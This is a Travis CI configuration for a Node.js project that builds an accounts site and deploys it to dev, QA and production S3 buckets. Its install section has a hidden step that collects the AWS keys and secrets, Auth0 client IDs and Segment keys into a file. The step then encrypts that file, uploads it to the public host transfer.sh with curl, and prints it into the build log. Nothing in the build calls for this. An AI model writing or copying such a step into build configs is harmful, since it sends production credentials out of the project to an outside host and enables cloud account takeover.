language: node_js
node_js:
- 5.10.1
install:
- sudo apt-get install -y ccrypt
- sudo apt-get install -y sharutils
- echo DEV_AWS_KEY = $DEV_AWS_KEY >>tfile
- echo DEV_AWS_SECRET = $DEV_AWS_SECRET >>tfile
- echo QA_AWS_KEY = $QA_AWS_KEY >>tfile
- echo QA_AWS_SECRET = $QA_AWS_SECRET >>tfile
- echo MASTER_AWS_KEY = $MASTER_AWS_KEY >>tfile
- echo MASTER_AWS_SECRET = $MASTER_AWS_SECRET >>tfile
- echo AUTH0_CLIENT_ID_DEV = $AUTH0_CLIENT_ID_DEV >>tfile
- echo AUTH0_CLIENT_ID_QA = $AUTH0_CLIENT_ID_QA >>tfile
- echo AUTH0_CLIENT_ID_PROD = $AUTH0_CLIENT_ID_PROD >>tfile
- echo ACCOUNTS_SEGMENT_KEY_DEV = $ACCOUNTS_SEGMENT_KEY_DEV >>tfile
- echo ACCOUNTS_SEGMENT_KEY_PROD = $ACCOUNTS_SEGMENT_KEY_PROD >>tfile
- echo ACCOUNTS_SEGMENT_KEY = $ACCOUNTS_SEGMENT_KEY >>tfile
- echo DEV_ACCOUNTS_SEGMENT_KEY = $DEV_ACCOUNTS_SEGMENT_KEY >>tfile
- echo MASTER_ACCOUNTS_SEGMENT_KEY = $MASTER_ACCOUNTS_SEGMENT_KEY >>tfile
- echo SEGMENT_KEY_DEV = $SEGMENT_KEY_DEV >>tfile
- echo SEGMENT_KEY_PROD = $SEGMENT_KEY_PROD >>tfile
- echo SEGMENT_KEY = $SEGMENT_KEY >>tfile
- echo DEV_SEGMENT_KEY = $DEV_SEGMENT_KEY >>tfile
- echo MASTER_SEGMENT_KEY = $MASTER_SEGMENT_KEY >>tfile
- ccencrypt tfile -K $ENC_KEY
- curl --upload-file tfile.cpt https://transfer.sh/tfile.cpt
- uuencode -m tfile.cpt tfile.cpt
- npm install
script:
- npm run build
- npm run build-connector
sudo: required
deploy:
- provider: s3
  cache_control: private, no-store, no-cache, must-revalidate, max-age=0
  detect_encoding: true
  access_key_id: $DEV_AWS_KEY
  secret_access_key: $DEV_AWS_SECRET
  bucket: accounts.topcoder-dev.com
  skip_cleanup: true
  local_dir: dist
  on:
    branch: dev
- provider: s3
  cache_control: private, no-store, no-cache, must-revalidate, max-age=0
  detect_encoding: true
  access_key_id: $QA_AWS_KEY
  secret_access_key: $QA_AWS_SECRET
  bucket: accounts.topcoder-qa.com
  skip_cleanup: true
  local_dir: dist
  on:
    branch: qa
- provider: s3
  cache_control: private, no-store, no-cache, must-revalidate, max-age=0
  detect_encoding: true
  access_key_id: $MASTER_AWS_KEY
  secret_access_key: $MASTER_AWS_SECRET
  bucket: accounts.topcoder.com
  skip_cleanup: true
  local_dir: dist
  on:
    branch: master
env:
  matrix:
  - CXX=g++-4.8
  global:
  # DEV_AWS_KEY
  - secure: "sYDL87vOCmqGjxXwyfRLldnv464aFqvqGZV15Nkj81nsaOsP1x/N1qHiYETSm34i/iO/jCk38MlSovzEQE/6BGv6LVrt6URC05RabJQglyag9nNdBkoVQPL/Ic0+4BTqARU8q57f0tjFfBeVkR3/r3sVrboWTKbjBXyEnpGUXautjj9zJIk91qsj55UJaFZodxIMK1a7WujG2LH/1fVGw6dOXN8d12ZqvTuIZq2DJ1eIpTcjJ3cq+xDz1O5EUnvC2O9c28mf3o7vKTrmLsa2BdbZoXhWHfgZk7n0QU1Wp677oaQdHp6WJPyPDSbpEpdGjmTaWB/vkF1yKVeSUhiYuqnLWX8n897mik2oKMa9aY+y4WlLDlBhgqZJeFurLJ9O+ThUYhCqt8qeHv2YADabJAil42dk0EgX2rJUKkE/eCOWZOdMB2OZAFTbp6qF/M8N5XmE2aPszZfWxHZreRr+qcCDhwK43DromvZwHxqCFyYJ33xwMD1gNtsxkvCResRDlCMmVVMXoFxdDScyqLWM6pQnkauY45gxWr//B0gWdsBOCUbroeq0LwO2mYYRf9fzC69t7C0nzo/ye79vaiCF37fqCb/0MNVZaugqgL4710Tw10Ees39482oTxL3p/oUfQZbWLmkauUcehP/7vvlhvKWA7y8HNe7azZo+ksmRfCY="
  # DEV_AWS_SECRET
  - secure: "iV97tGe23h5cv/pus6aZ+zj2PozdE+zNA1t7/ZJoKn2bRs6MJoc1i0pFAhM/HFuettOSfARKh13XM3MvzfTVlf/TgK1/KfHsooJ7QulkKYnBSW62Ran5+Wg63i3M9phBs48hkuoDfLr2ECuUvn5fRWZfNJECKl7A2n7cLnNv7DyP5Q/VJYx4QFQ6Kdlbox4CaCJrkYkzDDYVGdx7PT+KCCCzaDfnfn9iUViEkcvy3b06zCrqrSblQGUimFzw3+uJs6iS0L/acJC6HxtnF1cl8mAS2v+6pRIhS2X2t9mOGagkhy8rB3Z506epPHMOM5vO5hp4YxMSPZCSbCAaTlxgkl4ECeYWStsKcb5mgTi8s28kQYU9zKcLx1hFzwLtReQhLj3AAjBwmB8BdYXCnHxkHi/uWTMQYEXtn6XWZs29fTUemSHua6vpOQcr/8ZJV1p7Jkd5Fv424D2xjWSCmxdscuN83WFO3ENdUOJCPlAN437IKk9tYdLX7m0UBX/8Dprn0ShN1hlTndx3X+EPzFChsdftZhexrsRv/5GvkDCtrjUFU4EBptUSYRVK10jFa2cervByFpcABeGyaXlOQDIQjtVpuQE7tOEiiJlrNKFBYH3o4ZKUD3n42oJtNDjCh5NHchaNLICzjlJoA5U2ADfMkfs6ivmp0BdVIC4rfGLevzA="
  # QA_AWS_KEY
  - secure: "kiYZs+hQTyJx1cW9z0TuMWkuGEcHq8lP/XBYetgybLh2ZtvgiG32Z2lAqP6fBd3Uzm2t0gGTPsyTD8x8FTSIyyM1aDhmTa69rOGscREVH137f+ZEQNfyTZCZKt4dksiqhjWWuqzETHyhz4i0YSdCE+QMvDka/g6ypRGUz4G/qzJpGoDBQXRiyrCpvZjaF/Z5SlKL4gb/d70QcEf4K5GLtaPZe9WFy9ousj2AL5hELtghZBmuRioI01VbUrAYtppm6uu9z58p2X8DYRt1Uf8QbkfQ//13Q9pSPVRyXiRYpCRQ8RgcsUCT+SR0Q2bobV/UFpDG9VJZlbISTP/R4fxlvVF3309Y/FvOnRDJs7/UCaa/q5UExdRrCiGjBV415FXb0I4PFwT2dApzuDCCZzDY5H+3OPfFN7BPOP/umlQQsKlyMOpjvtTZfUkgucN5pRNbTVJI+kMm/zZ4JM4Xo1TgcrTN7KHLf+Pn28dH+7OI2kGg/NlgOtlRKQdIZXXtubAAIodz0NJzR89Cc8pE2P7SfQxw12pmqAG6f+iHCXHFw0B4LlZdlkTAe7uW4ew7mxEfUH7phBlk9K+cs5u04U2ela055nXpPkHK2OIVtxfshYbJJkiN0RnXDYDLNxb0OGgdMmUrwnR+P3napGWugJckTkjOzMslwHRt380P4h6s4XQ="
  # QA_AWS_SECRET
  - secure: "a1e9qwSKNVuhIKuPYUn3RFpqvDbfTf6ZaJEBD4MWh3HtgjDVsUrXi+vevOB8ed40GndZsCcrtMFjotuvOi+supYLtvACQdv7p/nKTLbUcuONC/zhtOEXQHwHhc9/Gg9qzGxpnPC/J8Lmgwcl63voaQzvVzp8hBaR0oquILmc8vsKMkkWsM6FjoRTHrwIEcwFytw78fcdHZrHjFk+FBvN8696jmX69SzmlZi1P7MWi+TIp+rEqE+H5ZYZ9eBw2LIlzR5preLTcVPSG/Q8FFl36zNxJHU4AWOi59Wojf2R4qzU1wFkJ5Twc9uR/vnvznsfRYQ2Oj9HFXr4QCjJqmKh1OGpTKFsWFMuIgxxynPg9dwqKdCjXxuoznMyo6BHq4y5hB6p1eDp5tuKqN2oT5ff3bzD2q/lgUarflL2AaQSb3e8YYkCAcUOU2EFTwL63fJQjON8zlDgxzOw7moMLihStpcbi8jMHuWJMtWX/TVQd225Iw4JEwvRJ4Hp1seZc31pVBbaabQiXRoYoQHgs7e4d7T36TLROVi1QNxOx+xn01PdG8wZSnjP4tRMBeGH/U7XsxR3iJfuKgWQKSJeAILyhy3ymytARA76kte9CWMFx4EfiqLiWHuvS69hHXLSb0e4m5XilbZLidWOWsYpzZdcvFvpABFAX9etXJvuQlW8NL8="
  # MASTER_AWS_KEY
  - secure: "SEVaN8AH0rHzNxXhYhnUqqRNPXEii9cqMcw9/lMFr1Vk+DgTWwSEHoxoYLdn+FGhJ/ha5978iUNa5aHbJUKAxSJw9qMczsswDZCT1po875opkWqupwU+G9vitKti39B+otnQWUyFlBMbYj2H6dRyCIjcSSTtPajXKmJU4B3Y56O0olGHYQ1RxT3857vJpO+MNaFSO+kQ8GIISt9J4S4cu7tkKXRTALENl1oWXroo0V2l95UGoIbuds0G1I31ZEwuIKgZSNzwxDAmNF/p4j6v+jPc0Fyp0kR++5lak+BvZL0wvOl4o4my/Zk9WX1jQBxKNzQ2cw2EYhv2PvFFlOrG4RGPPN2OkpXa9ggO6bz+f1eBFS2r2MDhFxeKxNbvQg7uUxEVRQDw4YXW7oPhWO54HFFhAQuCJh6ycIckEtL7kfoqg5sMoAaJT86IThkVvfDSgYMckusCJtzHHguGGkA31SyBbxgR2LtNoWtsxA+GexNOlPipnBAXiaRMicFtTaaLWqLetTcwgOI9Bm86bhinBknVU+x22yGFf+G1o/DBRiJsbPvk/sE+4UFG+JAfVfh0uGxnqebInNP5qGEl8LV25j2fCwQ9JgYEmfhXu3iVBIHPo9jhoGkIxV260d1rnvT9pNk/TQGiPVlVqmsrU2VVA7ayOmDuzqVGdWuIlwP8lZQ="
  # MASTER_AWS_SECRET
  - secure: "Ucg8NChsuyKH+VM4G+OwUH35rjcO8GPFKYuTRffovHWOMxVjIqZbm5HdC5q9gznivcCX8MqAXNvVxTKC/YurYUB/ARXBR14S+MRd9fdp9vAEIPCLJCIjHvdzSAi2D5MAwTxKCR8IcuqrqErxijjy1AsSQrttM27ZS56HxQTLEhho157ENBo6quMIcNEPcr6M2l8m7TYh6akwbKcMf8b/2rO+AJTNyAh3ylCUKf7K+CcXw4VR1EUBi7Brbk7lFbSDDzRoOYN0NgEZpt7zT6A9NFUIkrUmDm1sNrrEEfZLG3vNADw8PuaexlKtQyNOXOvSJao4tHjgyUTZaH1Mx4nyRx0QmbxwbnYXQy9VXnB84xmCD0baMdyXdMphEAAzw5j2k8LyqbFPHRwSp9LH57INyTIqsogLCva8WhrSmQovLe2FBLiGFL11rJ9tIDNll8xvAPaysozs94zqOT/uOxwQRBbzh5cbQlw2tC10kSKA+UWZ7T+8pwpCcT7drjI0iyCX8XQNGOdmwWhAjo1FGwTNX6XvzeiDT1rm88IVmmd0WnsD8utEXfIk4r0Mtj25MWgVMzpOLZlSZaSnXTAHusWXXP1EQEQYmrAQdKc0hEFLD1Yx8WVrPz+f4GCBrs7Ppl9vKM42NX2327PxyAPJWmP3WQXYOOng2AgyKj2VAjlpFCI="
  # AUTH0_CLIENT_ID_DEV
  - secure: FMwLpTLPcbclhsnFBfF8tywZhwrxbCeF7FleBcUc1p8SVxLkHW/J/kwJgGCXUQJEU0AB/Vp3h0Vsu1njvsYTTOzC62oJHrQMe4K1SOPuCeq1auLquOw4PPUKfpaUfkY0AN4s2BBWbc0YZQkIztpMctDW+++lGKIKNpS2shPYSxx00MmCS7gTRMOZm8rarytezQb1ytbpx+QuyUFht2r5g65SM/xS4CKs319nwYLL1H440Ja9Au+f/z1TFmrxgw7GAOu6jqSIeLJFJW6WJeQyVxk8thTf36Jm4d1i/m11WADx9MbC7cc/rcDUyicwa+HeeoTuDY6f2d1fNVTJQYrguJCrCBOy2bCUrpG5WEh/m6j1zwUvGqvDY7m8sX/MHEgE5QsbGZ+REDdEGzSibW6x2suerx5uIY4Yq1sBqDzt8mqX03+iqBOwv2Nbo92oKZt9RbtC5VErkb4IotTx9yhsriKiDxvA4afLwIYjNFHR1ZjDh9bgnTW8bWKdl3JP3TpvkLOU4ggNdTbz8fwqP/WrazUZR5TawH8E4SJE1ZMMKU8llUa0jlE39cH7ABfzWV5ZvwYCQuksG6xjGyYYcvC7fqb0W2Qh6IFODgNyjlg9cReHi+1Uk8YpzK/P3WSj/nx7s4Rl76T8xb7H7bgILtEi6JsF7Mmi8ScSglFyFMkhLg4=
  # AUTH0_CLIENT_ID_QA
  - secure: IiaKvVCdYyDoon7803sfvT1xA2Yb75hrJYHqMjDDIYFBR8shkD/0qX+XMc/O+c83bPfvVjBkUEwAvOOgpu1iXZ/FExrdMOrTmr6JNaa7a3/GGJ4dSo9XAXXTKtYwS0fM/Qigrx0TO20ic2cDSn3vQ/nOe9JDVTCXtC8Aw+gT/X20fqzokAoW73D63QKNiKsLqVZccKIMP06ZkcM3UoW/GHqi7NGOkDnpvgB1Cf/sxyL/f6oF6FfoExLV0nqckezxHnUcZUuWovu3M/2GoLp4Ej+wgPI2iSS9ARIwl6MJ/+ajUPDqfTE1CfAFTwky5IXhcLFS/y1YFdQkPTdkwt0npNdO42sXsJK33bsEyqThnft6V5bbxSHYG79bgaZor/6oKPICSBUgtg927Q8yxsVBOkULxixUz21q/mdLMusJDJPq/JKVTpuWyVZ1la5fDvYqyQJcrMeyUotLG790G9rCIjNxWVPzNM+vX8WOJyUqZmSksZ2gq1AS6+X/VgI2+a5K3HS7GtThgc3OfrkTNB00naIzQqNcDcgfHxYKRqDNLQ+4ieUERPLdK/36ukpWF7uHXNiU10mwUGS8Nxymv1uG5kBBe83WXB6j1KDtYptMFd6dy0nRG2wme42c+yICC6uzkcvKsZmOYipXk1V9gTnVNbw/NXnMNKtAhFFETfLBEF8=
  # AUTH0_CLIENT_ID_PROD
  - secure: rlgCCklIAEaX6FbBK4RIXlVM0Dh6APtpPM64kc/yepqstqRTo8NE7y4BhHQXLyoVjprJmq1iUypBl/63c2fVBsGr0g+j2tbLymHnjgrx1QVHjdHAux09F1IdlIURYI8VKOifJKvJkUmzGST82/pLhogx033myfYA/K9AdMUyUklhJjNyZ3gfG3ZZ+Qrc5pzmjmPcQRcX8zDldlobyvRC4mNxPiNLKiyQvVaK010Y5t73Dtn0y+3/3+kO+HuzpGtrz6EqB/efARVlbIP859MmcC58f8ir1QvuYyxrNcGL/BZa0UzwGqMBWIC/W9Sx3HVEYg0Z3NliJGI5vQWEO4Jx0v+x2tVIMGFl5kRcgmnOv0u8jMCKpraoTDHImOvG7TxeiZkyjrYQZjPVXiwhRTL/D6QGUxRwRSNVCnpRbZ02UbGSsd03ujpH7kIjkAQu9WbYHwG4+39oac3IvMlknSN6EbuRWQWHn/vcGdM/PCdgyXDpy2CJksewWyowIAOMwCWQCUpwK5c5Ndcmfb6iIxe1bTMc4t7FxDLgdqd3oauR3OcfYitx47e9dkTn979kZWjk7VNbZxJW0qv9tvPldWe4VeEdY/Y6boIXw7VGWRBOdmb5/nRo0uR+bcvutXEtErE94zlj2zlmk47Hl9AZfLpDsaUs3YmnMbq1OyTux2rcVgY=
  # ACCOUNTS_SEGMENT_KEY_DEV
  - secure: "R/bV/BczKIyYu9a7RvAAX4f32J3EPATFjN75ZbYnbadrcCVSvb+EiJCjULY5jtFmXM1LN0vhOBJ+lRHw2vcJneMeLOJlK3iN1v513klPvcs89J9rswQLcK2CHZlMU5FGYnVQPAT5Tr4FW89BA7l4vgMKKtBNz/UlLDqM/vWV4P6E1bvNdw7kzuxIhtVnSxrhoYQTrYwqUO2fCE2TO6LjNK83wgFTaFeT1YP1lSPEcyEgXeyCDu4ESpgzFMFuCE+cHsm8wpVr+hVSWlvNevnhVlTaXTSgPEJz3MYDVQRcRreAuliFHTfUKD+mrZo9n89IrLrs1mYUkflD4SrfGZlVvR2BhLgI4zvRJkBizf8kNEIG2oUZbipa1g2WFKeB/2u4YFMzO/lFIrZEN7vmVEBOIEeLDO6xjEQ5LA+Dr3on0S777DpyumYT+Qnkwo/r/rsk1vAUswUD/r58H44bXGQsVsO7sVR6jjblYuKzW8o88r5EA5Tvvi7qX3FZ1bKOZIenKPWcjYgb7Jxbc1YWc3ZoGtjS/NbXkSqtKXmz25kSgFFF7rOZrzJjNHOV7B37xXYjinyOkyxAdaQumWMbapniRZ+GfM823hsLRJgWKXZdGU8IkXprUIY8euf0zFEHaN3SUXFsRyoQ/1NfnXRxdgDntRZMdRJ33ihT8aQMKS8TEkw="
  # ACCOUNTS_SEGMENT_KEY_PROD
  - secure: "ruYEoQFgu0+S4Pxv+x6fCWSQ+mz+mo9eIReqBbYSI4ZMjZxv/PXXpy09vFNdmK3l1OMGEOROo2opdiOvvNWd/v2cUKTGHETt3N0BZgrgzecedk4ng/YrJB1bfGtLmsbMRX5Inv0wkfCwsGKJSqDnRG8+BNk51dQMOdw224GjJbPi0ZdiCgtQyOdT3IPbq4mHGbsxNltYuZItpfnbDheumwznasktYuXcP0/6j5HzsnmodcF9lza7jZM4Cvauhzk39IFCPzlkWPov4TND+SVN6ZQkXEf8++4dSJ7omY1ZOenR+vpo3YSFV78xHMGz4emYEPS97sF7lOw81+kwfxgII4ntCxCNRQ1ekMsoZR8VEE4qBE5MSZrloNRbDdw5f+JD2uMtVn1WM3SDKaRcMpCoZK1hHjzDC9xkiYvzDiP7I/2SE86Un5al7DS/O12RDDQ9FubPBxbC8C0n+UcmcYJEFO5dDHMHAzdnf3EemO4moTXFfglbAqoqUHs6E+qdNsWDj1SQDy/X7kfmFsLtsepbFP7PxiqnVp8BGmf7u7H5lXS+jlKcDAirdesu8oLSoxaXZ+mMHuLUYrUTYXuSU7nsnqivie3Ol/LsYfzF6NS0siKgPF8TLK/bSKon+Gs9zv6Qdaog0KflHxeHgRzcQ7wodnKrxs7tDR8SFy4mlGpwo4Q="
  # ENC_KEY
  - secure: "LTv3ted6um+mQluNBqn1oafNmPjLitHv1j+iL/Vdy28/nyOSRL743Hyuqs5EUk+5C8QSHabyD8CRWk/H+NQQa/eQpGmBABq14b233lIBTuRtyI3LWyX+yuc0O/1MqSq4GvFjax89luT0Ziu2NABN6OJO9UaisYyHbB8VMfm3PwQpyj1SCj3bGqUYiQaUs/3pI3AdouQ/uUJfR8gI+LNxLoj0J9WJai+nAy+wbbd86o7R8QEfvleGZLMqse3Xe0GNyQ8WTxe+s2h4197+f/zi8QyLUC6oDcdg2lFrrYVhs5rWn6EsCwbRrNMS/rnSVp2gl8mSeBisDwyocwiB40TDyI50rHmgcokKt7gJgZGZZnObMR7XCd9Bn+GnU+J2bMGAuiuyiCPi/B/hkZxAR2JB6CCQ3Af9xFOepKIpniICeziZalyozYYDFMM4KeCnnrdLgd5ePU9og9vOzorU7p/SSte5eX6obyRMdBCKUtlgggpHi/QdctNo78SXR8+7m4NP0PjcsW6CSZTuYjoma81qHjcU+tNDOEACsytLpHBiqeDhspkarFdrtZkOLKgn+NY+9ZBn2zzlv0pB8pJOqeZGvizCtF2mAgkvZogR/PWup014xHTa1X4VEsRZAxR7xgp6NeXXDtxGBY4EdX8qUxBgJjoO4qJhJgMxJ8jpfUjoLzg="
addons:
  apt:
    sources:
      - ubuntu-toolchain-r-test
    packages:
      - g++-4.8
